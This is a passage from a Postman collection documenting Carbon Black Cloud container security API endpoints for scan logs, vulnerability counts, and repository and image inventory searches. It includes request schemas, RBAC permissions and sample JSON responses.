charset=UTF-8"},{"key":"Content-Length","value":"294"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"Content-Encoding","value":"gzip"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Psc-Correlation-Id","value":"79611bae-ebe9-45e0-963d-cb41cde77be0"}],"cookie":[],"responseTime":null,"body":"{\n    \"2023-04-29T10:00:07.596Z\": {\n        \"CRITICAL\": 9,\n        \"HIGH\": 37,\n        \"LOW\": 51,\n        \"MEDIUM\": 36,\n        \"UNKNOWN\": 1\n    },\n    \"2023-04-30T10:00:04.419Z\": {\n        \"CRITICAL\": 11,\n        \"HIGH\": 40,\n        \"LOW\": 60,\n        \"MEDIUM\": 56,\n        \"UNKNOWN\": 13\n    },\n    \"2023-05-01T10:00:10.253Z\": {\n        \"CRITICAL\": 13,\n        \"HIGH\": 56,\n        \"LOW\": 77,\n        \"MEDIUM\": 76,\n        \"UNKNOWN\": 32\n    }\n}"}],"_postman_id":"cc6c43f3-1763-42a7-b017-9003885b886a"}],"id":"1439aa32-abb3-47a9-a687-e8f31b6dfc0e","_postman_id":"1439aa32-abb3-47a9-a687-e8f31b6dfc0e","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Scan Logs","item":[{"name":"Get Metadata of Scan Logs","id":"95a61739-f4a2-44de-9450-6472ed4563da","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/inventory/scan_logs/metadata","description":"<p>Get lists of possible clusters and namespaces to use in the search criteria for Scan Logs.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>workloads.container.image</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n<h3 id=\"response-schema\">Response Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"clusters\": \"&lt;array&gt;\",\n  \"namespaces\": \"&lt;array&gt;\"\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1beta","orgs","{{cb_org_key}}","inventory","scan_logs","metadata"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"f234723f-b3dc-4048-abca-44cf66ed55ec","name":"Get Metadata of Scan Logs","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/inventory/scan_logs/metadata"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 02 May 2023 03:49:38 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"167"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"Content-Encoding","value":"gzip"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Psc-Correlation-Id","value":"59c9e5a5-c186-4c6b-87c2-090b77cfe5fa"}],"cookie":[],"responseTime":null,"body":"{\n    \"clusters\": [\n        \"demo:cluster-one\",\n        \"test:testing-cluster-one\"\n    ],\n    \"namespaces\": [\n        \"demo-namespace\",\n        \"testing-namespace\"\n    ],\n    \"hostnames\": [\n        \"demo-hostname\",\n        \"testing-hostname\"\n    ]\n}"}],"_postman_id":"95a61739-f4a2-44de-9450-6472ed4563da"},{"name":"Search Scan Logs","id":"6a82e728-4bfb-4788-ac79-df113143d220","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"query\": \"\",\n    \"sort\": [\n        {\n            \"field\": \"scan_time\",\n            \"order\": \"DESC\"\n        }\n    ],\n    \"start\": 0,\n    \"rows\": 50,\n    \"criteria\": {\n        \"namespaces\": [\n            \"demonamespace\"\n        ],\n        \"scan_time\": {\n            \"start\": \"2023-04-01T03:34:31.972Z\"\n        }\n    }\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/inventory/scan_logs/_search","description":"<p>Search for scan logs that match the specified criteria</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>workloads.container.image</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"query\": \"&lt;string&gt;\",\n    \"criteria\": {\n        \"scan_time\": {\n            \"range\": \"&lt;string&gt;\",\n            \"start\": \"&lt;string&gt;\",\n            \"end\": \"&lt;string&gt;\"\n        },\n        \"full_tags\": [\n            \"&lt;string&gt;\"\n        ],\n        \"repositories\": [\n            \"&lt;string&gt;\"\n        ],\n        \"digests\": [\n            \"&lt;string&gt;\"\n        ],\n        \"sources\": [\n            \"&lt;string&gt;\"\n        ],\n        \"registries\": [\n            \"&lt;string&gt;\"\n        ],\n        \"vulnerabilities\": [\n            \"&lt;string&gt;\"\n        ],\n        \"clusters\": [\n            \"&lt;string&gt;\"\n        ],\n        \"namespaces\": [\n            \"&lt;string&gt;\"\n        ]\n    }\n}\n\n</code></pre>\n<h3 id=\"response-schema\">Response Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"num_found\": &lt;integer&gt;,\n  \"results\": [\n    {\n      \"full_tag\": \"&lt;string&gt;\",\n      \"manifest_digest\": \"&lt;string&gt;\",\n      \"scan_time\": \"&lt;string&gt;\",\n      \"source\": \"&lt;string&gt;\",\n      \"vulnerabilities_summary\": {\n        \"CRITICAL\": {\n          \"amount\": &lt;integer&gt;\n        },\n        \"HIGH\": {\n          \"amount\": &lt;integer&gt;\n        },\n        \"MEDIUM\": {\n          \"amount\": &lt;integer&gt;\n        },\n        \"LOW\": {\n          \"amount\": &lt;integer&gt;\n        },\n        \"UNKNOWN\": {\n          \"amount\": &lt;integer&gt;\n        }\n      },\n      \"workloads\": &lt;integer&gt;,\n      \"has_malware\": &lt;boolean&gt;\n    },\n    {\n      \"full_tag\": \"&lt;string&gt;\",\n      \"manifest_digest\": \"&lt;string&gt;\",\n      \"scan_time\": \"&lt;string&gt;\",\n      \"source\": \"&lt;string&gt;\",\n      \"vulnerabilities_summary\": {\n        \"CRITICAL\": {\n          \"amount\": &lt;integer&gt;\n        },\n        \"HIGH\": {\n          \"amount\": &lt;integer&gt;\n        },\n        \"MEDIUM\": {\n          \"amount\": &lt;integer&gt;\n        },\n        \"LOW\": {\n          \"amount\": &lt;integer&gt;\n        },\n        \"UNKNOWN\": {\n          \"amount\": &lt;integer&gt;\n        }\n      },\n      \"workloads\": &lt;integer&gt;\n      \"has_malware\": &lt;boolean&gt;\n    }\n  ]\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1beta","orgs","{{cb_org_key}}","inventory","scan_logs","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"6343e6fb-c49c-4e6f-8ee4-bc45e4bd15be","name":"Search Scan Logs","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"query\": \"\",\n    \"sort\": [\n        {\n            \"field\": \"scan_time\",\n            \"order\": \"DESC\"\n        }\n    ],\n    \"start\": 0,\n    \"rows\": 50,\n    \"criteria\": {\n        \"namespaces\": [\n            \"demonamespace\"\n        ],\n        \"scan_time\": {\n            \"start\": \"2023-04-01T03:34:31.972Z\"\n        }\n    }\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/inventory/scan_logs/_search"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 02 May 2023 03:44:39 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"303"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"Content-Encoding","value":"gzip"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Psc-Correlation-Id","value":"d4404962-1612-45d5-abc5-5a9df79a3831"}],"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": 1,\n    \"results\": [\n        {\n            \"full_tag\": \"demo.io/demo-samples/microservices-demo/myservice:v0.1.2\",\n            \"manifest_digest\": \"sha256:1abc234d56ef7dda66d924651df9ea89831cd8b04f2a02d412d2f3b0a92e1a7b\",\n            \"workloads\": 2,\n            \"scan_time\": \"2023-04-05T08:03:13Z\",\n            \"source\": \"CLUSTER_SCAN\",\n            \"vulnerabilities_summary\": {\n                \"HIGH\": {\n                    \"amount\": 17\n                },\n                \"MEDIUM\": {\n                    \"amount\": 10\n                }\n            },\n            \"has_malware\": false\n        }\n    ]\n}"}],"_postman_id":"6a82e728-4bfb-4788-ac79-df113143d220"},{"name":"Get Scan Log Facets","id":"64da5506-30d8-40ec-9666-edc29f1678f6","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"query\": \"kube\",\n    \"terms\": {\n        \"fields\": [\n            \"clusters\",\n            \"scan_status\",\n            \"repositories\"\n        ],\n        \"rows\": 50\n    },\n    \"criteria\": {\n        \n        \"scan_time\": {}\n    }\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/inventory/scan_logs/_facet","description":"<p>Get facets that can be used to guide other scan log searches.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>workloads.container.image</td>\n<td>READ, CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"query\": \"&lt;string&gt;\",\n  \"criteria\": {\n    \"scan_time\": {\n      \"range\": \"&lt;string&gt;\",\n      \"start\": \"&lt;string&gt;\",\n      \"end\": \"&lt;string&gt;\"\n    },\n    \"full_tags\": [\n      \"&lt;string&gt;\"\n    ],\n    \"repositories\": [\n      \"&lt;string&gt;\"\n    ],\n    \"digests\": [\n      \"&lt;string&gt;\"\n    ],\n    \"sources\": [\n      \"&lt;string&gt;\"\n    ],\n    \"registries\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vulnerabilities\": [\n      \"&lt;string&gt;\"\n    ],\n    \"clusters\": [\n      \"&lt;string&gt;\"\n    ],\n    \"namespaces\": [\n      \"&lt;string&gt;\"\n    ]\n  },\n  \"terms\": {\n    \"fields\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rows\": &lt;integer&gt;\n  }\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1beta","orgs","{{cb_org_key}}","inventory","scan_logs","_facet"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"f88b93f0-9f3b-41a4-9f68-186b2dc4f798","name":"Scan Log Facets","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"query\": \"kube\",\n    \"terms\": {\n        \"fields\": [\n            \"clusters\",\n            \"scan_status\",\n            \"repositories\"\n        ],\n        \"rows\": 50\n    },\n    \"criteria\": {\n        \"namespaces\": [\n            \"demonamespace\"\n        ],\n        \"sources\": [\n            \"FEED_UPDATE\"\n        ],\n        \"scan_time\": {}\n    }\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/inventory/images/_facet"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 02 May 2023 04:12:25 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"520"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"Content-Encoding","value":"gzip"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Psc-Correlation-Id","value":"7723fcf2-c1ff-4577-a90c-8b6e3867a14c"}],"cookie":[],"responseTime":null,"body":"{\n    \"terms\": [\n        {\n            \"field\": \"scan_status\",\n            \"values\": [\n                {\n                    \"name\": \"SCANNED\",\n                    \"total\": 78\n                },\n                {\n                    \"name\": \"SCAN_FAILED\",\n                    \"total\": 1\n                },\n                {\n                    \"name\": \"NOT_SCANNED\",\n                    \"total\": 8\n                },\n                {\n                    \"name\": \"PENDING_SCAN\",\n                    \"total\": 4\n                }\n            ]\n        },\n        {\n            \"field\": \"clusters\",\n            \"values\": [\n                {\n                    \"name\": \"demo:cluster-one\",\n                    \"total\": 14\n                },\n                {\n                    \"name\": \"test:testing-cluster-one\",\n                    \"total\": 14\n                }\n            ]\n        },\n        {\n            \"field\": \"repositories\",\n            \"values\": [\n                {\n                    \"name\": \"demoartifactory/cluster-scanner\",\n                    \"total\": 1\n                }\n            ]\n        }\n    ]\n}"}],"_postman_id":"64da5506-30d8-40ec-9666-edc29f1678f6"}],"id":"4133b60f-40b5-4575-867b-44f210910a22","_postman_id":"4133b60f-40b5-4575-867b-44f210910a22","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Image Analysis Inventory","item":[{"name":"Search Repositories","id":"6c81f7ef-3fd9-4c62-a465-8f49eb929b59","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"query\": \"proxy\",\n    \"sort\": [\n        {\n            \"field\": \"last_scanned\",\n            \"order\": \"DESC\"\n        }\n    ],\n    \"start\": 0,\n    \"rows\": 50\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/inventory/repositories/_search","description":"<p>Search for repositories and get a list of repositories matching the criteria and their metadata.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>workloads.container.image</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"query\": \"&lt;string&gt;\",\n  \"start\": &lt;integer&gt;,\n  \"rows\": &lt;integer&gt;,\n  \"sort\": [\n    {\n      \"field\": \"&lt;string&gt;\",\n      \"order\": \"&lt;string&gt;\"\n    },\n    {\n      \"field\": \"&lt;string&gt;\",\n      \"order\": \"&lt;string&gt;\"\n    }\n  ]\n}\n\n</code></pre>\n<h3 id=\"response-schema\">Response Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"num_found\": &lt;integer&gt;,\n  \"results\": [\n    {\n      \"repo\": \"&lt;string&gt;\",\n      \"registry\": \"&lt;string&gt;\",\n      \"all_tags\": &lt;integer&gt;,\n      \"scanned_tags\": &lt;integer&gt;,\n      \"last_scan_time\": \"&lt;string&gt;\"\n    }\n  ]\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1beta","orgs","{{cb_org_key}}","inventory","repositories","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"41c10a16-10d2-4721-ac11-796a689e8b71","name":"Search Repositories","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"query\": \"proxy\",\n    \"sort\": [\n        {\n            \"field\": \"last_scanned\",\n            \"order\": \"DESC\"\n        }\n    ],\n    \"start\": 0,\n    \"rows\": 1\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/inventory/repositories/_search"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 02 May 2023 03:31:41 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"499"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"Content-Encoding","value":"gzip"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Psc-Correlation-Id","value":"5750d698-20ff-40e3-b4e6-338e206296cd"}],"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": 15,\n    \"results\": [\n        {\n            \"repo\": \"kube-proxy-amd64\",\n            \"registry\": \"my.demo.repo\",\n            \"all_tags\": 4,\n            \"scanned_tags\": 3,\n            \"last_scan_time\": \"2023-05-01T11:38:17Z\"\n        }\n}"}],"_postman_id":"6c81f7ef-3fd9-4c62-a465-8f49eb929b59"},{"name":"Search Images","id":"6cb7a570-b1b4-44b2-8a69-acc34b2eda50","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"query\": \"\",\n    \"criteria\": {\n        \"is_running\": true,\n        \"vulnerabilities\":[\"CRITICAL\"],\n        \"repositories\":[\"demoartifactory/guardrails-enforcer\"]\n    },\n    \"sort\": [\n        {\n            \"field\": \"vulnerabilities\",\n            \"order\": \"DESC\"\n        }\n    ],\n    \"start\": 0,\n    \"rows\": 1\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/inventory/images/_search","description":"<p>Search for images and get a list of images matching the criteria and their metadata.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>workloads.container.image</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"query\": \"&lt;string&gt;\",\n    \"start\": &lt;integer&gt;,\n    \"rows\": &lt;integer&gt;,\n    \"sort\": [\n        {\n            \"field\": \"&lt;string&gt;\",\n            \"order\": \"&lt;string&gt;\"\n        },\n        {\n            \"field\": \"&lt;string&gt;\",\n            \"order\": \"&lt;string&gt;\"\n        }\n    ],\n    \"criteria\": {\n        \"workloads\": [\n            {\n                \"cluster\": \"&lt;string&gt;\",\n                \"kind\": \"&lt;string&gt;\",\n                \"name\": \"&lt;string&gt;\",\n                \"namespace\": \"&lt;string&gt;\"\n            }\n        ],\n        \"vulnerabilities\": [\n            \"&lt;string&gt;\"\n        ],\n        \"fixes\": [\n            \"&lt;string&gt;\"\n        ],\n        \"scan_status\": [\n            \"&lt;string&gt;\"\n        ],\n        \"clusters\": [\n            \"&lt;string&gt;\"\n        ],\n        \"namespaces\": [\n            \"&lt;string&gt;\"\n        ],\n        \"cves\": [\n            {\n                \"cve\": \"&lt;string&gt;\",\n                \"package\": \"&lt;string&gt;\",\n                \"type\": \"&lt;string&gt;\"\n            }\n        ],\n        \"registries\": [\n            \"&lt;string&gt;\"\n        ],\n        \"repositories\": [\n            \"&lt;string&gt;\"\n        ],\n        \"is_running\": &lt;boolean&gt;\n    }\n}\n\n</code></pre>\n<h3 id=\"response-schema\">Response Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"num_found\": &lt;integer&gt;,\n  \"results\": [\n    {\n      \"scan_status\": {},\n      \"error_type\": {},\n      \"last_scan_time\": {},\n      \"kubernetes_summary\": {},\n      \"vulnerabilities_summary\": {},\n      \"fixes_available\": &lt;integer&gt;,\n      \"has_malware\": {},\n      \"full_tag\": \"&lt;string&gt;\",\n      \"manifest_digest\": \"&lt;string&gt;\",\n      \"registry\": \"&lt;string&gt;\",\n      \"repo\": \"&lt;string&gt;\",\n      \"tag\": \"&lt;string&gt;\",\n      \"repo_digests\": [\n        \"&lt;string&gt;\"\n      ]\n    }\n  ]\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1beta","orgs","{{cb_org_key}}","inventory","images","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"0265a561-5339-42da-9fd2-72e53183cce8","name":"Search Images","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"query\": \"\",\n    \"criteria\": {\n        \"is_running\": true,\n        \"vulnerabilities\":[\"CRITICAL\"],\n        \"repositories\":[\"demoartifactory/guardrails-enforcer\"]\n    },\n    \"sort\": [\n        {\n            \"field\": \"vulnerabilities\",\n            \"order\": \"DESC\"\n        }\n    ],\n    \"start\": 0,\n    \"rows\": 1\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/inventory/images/_search"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 02 May 2023 03:18:05 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"552"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"Content-Encoding","value":"gzip"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Psc-Correlation-Id","value":"af026041-a903-48ad-a84a-61643bb74094"}],"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": 2,\n    \"results\": [\n        {\n            \"full_tag\": \"docker.io/demoartifactory/guardrails-enforcer:1.2.3-rc1\",\n            \"registry\": \"docker.io\",\n            \"repo\": \"demoartifactory/guardrails-enforcer\",\n            \"tag\": \"2.3.0-rc3\",\n            \"manifest_digest\": \"sha256:a12b34c56789b674f5d011d8ddb82aa4f04434e083ac9de4b07b632c1cec594f\",\n            \"repo_digests\": [],\n            \"scan_time\": \"2023-01-17T12:44:18Z\",\n            \"last_scan_time\": \"2023-01-17T12:44:18Z\",\n            \"vulnerabilities_summary\": {\n                \"CRITICAL\": {\n                    \"amount\": 1,\n                    \"fixes\": 1\n                },\n                \"HIGH\": {\n                    \"amount\": 4,\n                    \"fixes\": 3\n                },\n                \"LOW\": {\n                    \"amount\": 50,\n                    \"fixes\": 33\n                },\n                \"MEDIUM\": {\n                    \"amount\": 26,\n                    \"fixes\": 24\n                }\n            },\n            \"fixes_available\": 61,\n            \"scan_status\": \"SCANNED\",\n            \"kubernetes_summary\": {\n                \"clusters\": 1,\n                \"deployments\": 1,\n                \"namespaces\": 1,\n                \"workloads\": 1\n            },\n            \"workloads_count\": 1,\n            \"exceptions\": 0,\n            \"can_rescan_image\": true,\n            \"error_type\": \"\",\n            \"has_malware\": false\n        }\n    ]\n}"}],"_postman_id":"6cb7a570-b1b4-44b2-8a69-acc34b2eda50"},{"name":"Get Image Facets","id":"3a6ceb0b-0b63-43b2-b4b0-a8418c2da2db","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"query\": \"\",\n    \"criteria\": {\n        \"is_running\": true\n    },\n    \"terms\": {\n        \"fields\": [\n            \"scan_status\",\n            \"reputations\",\n            \"vulnerabilities\",\n            \"fixes\",\n            \"namespaces\",\n            \"clusters\",\n            \"repositories\"\n        ],\n        \"rows\": 50\n    }\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/inventory/images/_facet","description":"<p>Get facets that can be used to guide other image inventory 